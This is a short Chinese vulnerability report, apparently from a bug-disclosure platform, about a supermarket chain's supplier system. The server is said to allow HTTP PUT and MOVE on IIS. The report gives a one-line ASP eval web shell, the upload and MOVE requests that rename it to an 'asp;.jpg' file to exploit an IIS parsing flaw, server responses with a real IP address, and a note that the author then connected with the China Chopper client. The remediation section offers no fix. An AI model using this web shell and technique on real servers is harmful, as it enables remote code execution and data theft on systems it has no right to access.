华联超市某站危险方法导致任意文件上传,已she

华联超市股份有限公司是中国国内第一家上市的连锁超市公司，其前身为成立于1993年1月的上海华联超市公司。

本 漏洞 出现在华联超市供应商系统中，导致供应商信息泄露。

详细说明：

由于IIS配置不当，开放put、move方法，导致文件上传，并且可move为jpg文件，利用IIS解析漏洞可执行上传文件。

 

在测试过程中出现了个小插曲，只能put txt文件，不能move为 asp 文件，后来发现可以move为jpg文件。

 

 

请求：

 

 

 

 

 

 

<%eval request("testtest")%>

 

返回：

 

HTTP/1.1 201 Created

 

Date: Tue, 25 Jun 2013 14:01:47 GMT

 

 

X-Powered-By: ASP.NET

 

Location: http://218.204.14.84/te.txt

 

 

Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

 

请求：

 

 

 

Destination: http://218.204.14.84/sh.asp;.jpg

 

返回：

 

HTTP/1.1 201 Created

 

Date: Tue, 25 Jun 2013 13:59:03 GMT

 

 

X-Powered-By: ASP.NET

 

Location: http://218.204.14.84/sh.asp;.jpg

 

Content-Type: text/xml

 

 

上传上去后直接上菜刀

 

 

修复方案：

好多漏洞，都不知道咋补

查看更多关于华联超市某站危险方法导致任意文件上传,已she的详细内容...